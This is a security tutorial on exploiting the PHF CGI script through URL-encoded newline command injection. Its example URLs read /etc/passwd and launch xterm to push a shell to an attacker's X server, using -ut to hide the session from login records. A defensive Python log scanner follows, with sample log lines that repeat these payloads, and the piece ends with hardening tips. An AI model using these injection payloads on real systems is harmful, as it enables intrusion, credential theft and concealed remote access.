Back Channeling using Xterm
Introduction
An attacker can get a shell even if the server runs only a single service, HTTPD on port 80. In this scenario a single vulnerability in that service which allows an attacker to execute a command is sufficient for a skilled attacker to gain interactive shell access.
Let's say the target server is running a script called PHF, or any other script or program that allows an attacker to execute commands. In this tutorial we assume that the target server is running the PHF script, which shipped by default with older versions of the Apache web server, together with the UNIX X Window System. X is a windowing facility that allows many different programs to share a graphical display. It is extremely flexible and allows X client programs to send their output to the local X server or to a remote X server listening on ports 6000-6003.

Preparing for the attack
Now, in this scenario the attacker takes advantage of the PHF exploit and of one of the X clients most useful to attackers, xterm. Xterm is a utility used to start a local command shell while running X. However, through its -display option, the attacker can direct that command shell to the attacker's own X server.
Before we move further you might want to take a look at the PHF exploit. To execute a command on the server, the attacker uses a browser to request a URL from the target server on port 80 that looks something like:

http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Let's take a closer look at the above URL. It causes the remote web server to execute the command 'cat /etc/passwd' and return the contents of the /etc/passwd file to the attacker. %0a is a URL-encoded newline, which separates the injected command from the alias value, and %20 is used in place of spaces because %20 is the hex value of a space.

Executing the attack
Now the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting the following URL:

http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0

Once the exploit has executed successfully, the remote web server simply runs xterm with the -display and -ut options and sends the window to the attacker's X server, display number 0, screen 0. Because -ut was given, xterm does not write a utmp entry, so the session does not show up in the system's login records. Voila! The attacker has now gained interactive shell access and total control over the system.
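From the defender's side, both requests above leave a distinctive trace in the web server's access log: a request for /cgi-bin/phf whose query string contains a URL-encoded newline, followed by the injected command. The following Python script is an added example, not part of the original article, that parses Apache-style access log lines, decodes the query string, flags the newline injection and classifies the xterm back-channel variant separately, extracting the -display target so an analyst knows where the shell was sent. The log lines are constructed samples using documentation addresses, and the field names in the findings are the script's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample of Apache common-log lines (not real traffic).
# Lines 1 and 2 mirror the two requests discussed in the article.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2011:12:01:02 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1834
203.0.113.5 - - [10/Mar/2011:12:01:40 +0000] "GET /cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20203.0.113.5:0.0 HTTP/1.0" 200 0
198.51.100.7 - - [10/Mar/2011:12:02:11 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
198.51.100.9 - - [10/Mar/2011:12:03:00 +0000] "GET /index.html HTTP/1.0" 200 4096
"""

# Minimal common-log parser: source address, timestamp, request target, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Matches "xterm ... -display host:display" inside an injected command.
XTERM_RE = re.compile(r'xterm\b.*?-display\s+(\S+)')


def analyse_target(target):
    """Return a finding dict if the request target is a phf newline injection, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/phf"):
        return None
    # parse_qs percent-decodes the values, so %0a becomes a real newline here.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            m = re.search(r'[\r\n]+(.*)', value, re.S)
            if not m:
                continue  # an ordinary alias lookup, no injected command
            command = m.group(1).strip()
            finding = {"param": name, "command": command, "kind": "command-execution"}
            xm = XTERM_RE.search(command)
            if xm:
                # The X display the shell was pushed to, e.g. attacker host, display 0.
                finding["kind"] = "xterm-backchannel"
                finding["display"] = xm.group(1)
            return finding
    return None


def scan_log(text):
    """Scan access-log text and return a list of findings with source and timestamp attached."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyse_target(m.group("target"))
        if finding:
            finding.update(src=m.group("src"), ts=m.group("ts"), status=m.group("status"))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['kind']}: {f['command']}"
              + (f" -> display {f['display']}" if "display" in f else ""))
```

A status of 200 on the xterm line, combined with an outbound connection from the web server to port 6000 on the same source address, is the pairing to look for in firewall logs; an HTTP 404 on the same request means the script was not present and the attempt failed.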

Additional security tips
However, protecting against such attacks is extremely difficult. The best approach is to secure yourself by removing unnecessary programs and services. You can increase your security and protect against this attack by removing X from your system. Because of vulnerabilities in X binaries, local users may also be able to escalate their privileges to root, besides shovelling an xterm to a remote attacker.

